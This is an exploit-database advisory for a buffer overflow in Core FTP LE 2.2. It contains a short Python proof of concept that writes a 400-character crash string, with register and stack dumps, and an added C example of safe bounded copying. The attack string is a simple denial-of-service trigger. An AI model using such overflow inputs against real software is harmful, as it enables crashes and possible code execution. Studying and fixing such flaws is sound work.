Core FTP Le 2.2 Buffer Overflow



EKU-ID: 5689 CVE: OSVDB-ID:
Author: s0nk3y Published: 2016-07-12 Verified: Verified


#!/usr/bin/env python
'''
# Exploit Title: Core FTP Le v2.2 - Proxy Password Buffer Overflow
# Date: 2016-7-11
# Author: s0nk3y
# Software Link: ftp://ftp.coreftp.com/coreftplite.exe
# Version: 2.2
# Tested on: Windows XP
# CVE: N/A
# Type: Buffer Overflow

[+] Proof of concept
 Click options (Global Settings) -> Proxy -> enter the password and input "A"*400 -> Ok 

[+] Registers Detail:
EAX 0012CF54 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
ECX 41414145
EDX 0012CE64
EBX 41414145
ESP 0012CB1C
EBP 0012D0C4 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
ESI 41414141
EDI 0012CF54 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
EIP 004A1523 coreftp.004A1523
'''

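# Build the 400-character string used in the proof of concept above
buffer = "A" * 400
# Write it to exploit.txt; the context manager closes the file on exit
with open("exploit.txt", "w") as exploit:
    exploit.write(buffer)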

'''
[+] Stack:
0012CCEC   00000003  ...
0012CCF0   00498BFE  þ‹I.  RETURN to coreftp.00498BFE from coreftp.004A1520
0012CCF4   0012D124  $Ñ.  ASCII "AAAAAAAAAAAAA...
0012CCF8   0012D034  4Ð.
0012CCFC   41414141  AAAA
0012CD00   00000000  ....
0012CD04   41414141  AAAA
0012CD08   41414141  AAAA
0012CD0C   41414141  AAAA
0012CD10   41414141  AAAA
0012CD14   41414141  AAAA
0012CD18   41414141  AAAA
0012CD1C   41414141  AAAA
....
'''
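
Added example, not part of the original advisory and not Core FTP's code: the crash above is the result of a dialog field being copied into a fixed-size buffer without a length check, and the corrective pattern is to reject overlong input before any copy happens. The struct, the function names and the 64-byte field size are assumptions for illustration; the page does not give the real buffer size.

```c
#include <stddef.h>
#include <string.h>

/* Assumed size: the real Core FTP LE buffer size is not given on the page. */
#define PROXY_PASS_MAX 64

enum field_status { FIELD_OK = 0, FIELD_TOO_LONG = -1, FIELD_BAD_ARG = -2 };

/* Hypothetical settings record: the password sits next to other data,
 * so an unchecked copy would overwrite whatever follows it. */
struct proxy_settings {
    char password[PROXY_PASS_MAX];
    char host[32];
};

void proxy_settings_init(struct proxy_settings *cfg)
{
    memset(cfg, 0, sizeof *cfg);
    strcpy(cfg->host, "proxy.example.test"); /* constructed sample value */
}

/* Unsafe pattern behind this class of crash, shown for contrast only:
 *     strcpy(cfg->password, input);    no length check at all
 */

/* Store a dialog field, rejecting (not truncating) input that does not fit.
 * On any error the destination is left untouched. */
int set_proxy_password(struct proxy_settings *cfg, const char *input)
{
    const char *nul;
    size_t len;

    if (cfg == NULL || input == NULL)
        return FIELD_BAD_ARG;

    /* Look for the terminator within the space available, no further. */
    nul = memchr(input, '\0', sizeof cfg->password);
    if (nul == NULL)
        return FIELD_TOO_LONG;              /* no room for text plus NUL */

    len = (size_t)(nul - input);
    memcpy(cfg->password, input, len + 1);  /* includes the terminator */
    return FIELD_OK;
}
```

Rejecting rather than silently truncating keeps a stored credential from differing from what the user typed, and lets the dialog report the limit.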